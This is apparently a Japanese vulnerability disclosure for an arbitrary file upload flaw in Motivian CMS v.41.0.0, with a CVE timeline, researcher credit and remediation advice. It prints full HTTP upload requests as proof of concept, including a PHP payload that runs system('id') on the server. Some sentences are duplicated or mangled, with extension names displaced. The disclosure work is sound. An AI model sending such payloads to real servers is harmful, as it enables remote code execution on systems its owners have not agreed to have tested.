
このリポジトリは、Motivian Content Management System v.41.0.0で発見されたセキュリティ脆弱性を公開しています。
このリポジトリは、Motivian Content Management System v.41.0.0 で発見されたセキュリティ脆弱性を公開するものです。
この脆弱性は、責任ある開示(responsible disclosure)の慣行に従ってベンダーとMITREに報告されました。MITREは暫定CVE IDを割り当てました。詳細は45日間の開示期間の満了後に公開されます。
Content/Gallery/ImagesMotivian Content Management System v.41.0.0 のファイルアップロード脆弱性により、リモートの攻撃者が コンポーネントを介して、悪意のあるコードを含む細工された拡張子(例: 、、)の任意のファイルをアップロードできる可能性があります。
Content/Gallery/Images.php.png.txtこの脆弱性は、さまざまな拡張子を持つファイルをアップロードすることで悪用される可能性があります。実証目的のため、2つの概念実証ケースが使用されました。1つは悪意のあるコードを含む .php ファイル、もう1つは EICAR テスト文字列を使用した .txt ファイルです。両方のファイルは Content/Gallery/Images コンポーネントを介してアップロードされました。
以下は、この問題を実証するために使用されたHTTPリクエストとレスポンスの完全な転写です。
POST /portal/admin/cms/browseManageCmsResources!uploadFile.action HTTP/1.1
Host: [REDACTED]
Content-Length: 808
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2oYL3KVZBlAQmYAA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="resFolderId"
-8
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="allowedExtensions"
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="hidePageComponents"
false
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="struts.token.name"
token
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="token"
M53N7SE0QE1Z4MZV4BRV59QW3TSEZ962
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="uploadResource"; filename="eicar.txt"
Content-Type: text/plain
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
------WebKitFormBoundary2oYL3KVZBlAQmYAA--
POST /portal/admin/cms/browseManageCmsResources!uploadFile.action HTTP/1.1
Host: [REDACTED]
Content-Length: 789
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLdWSMj4ASbAC9uOz
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="resFolderId"
304802
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="allowedExtensions"
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="hidePageComponents"
false
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="struts.token.name"
token
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="token"
77PMJUJH5ZAQTPWRG5TQCLIOR9CUBK0M
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="uploadResource"; filename="test.php5"
Content-Type: application/octet-stream
<?php
echo system('id');
?>
------WebKitFormBoundaryLdWSMj4ASbAC9uOz--
HTTP/1.1 200 OK
Connection: close
Date: Thu, 06 Feb 2025 10:26:29 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: it-IT
Content-Length: 16729
ユーザーによる任意のファイルのアップロードを許可しないでください。厳格なファイル検証(MIMEタイプとコンテンツの検査)を実装し、ファイル名をランダム化し、アップロードディレクトリを制限してください。
| 日付 | 対応 |
|---|---|
| 2025-02-06 | CVE IDリクエスト(CNA: MITRE) |
| 2025-04-02 | CVE ID割り当て |
| 2025-04-07 | 脆弱性をベンダーへ報告 |
| 2025-05-31 | 45日間の開示期間の満了後(合計54日間)に公開 |
| 2025-06-04 | MITREデータベースおよびNIST/NVDポータルへの公式登録と掲載 |
発見者および責任ある開示者:
Francesco Marcuccio
サイバーセキュリティコンサルタント、ペネトレーションテスター
MITREの発見者帰属として記載:
Francesco Marcuccio
サイバーセキュリティコンサルタント、ペネトレーションテスター
このCVE IDは公式にPUBLISHEDステータスです。NISTによる分析後、CVSSスコアが更新される予定です。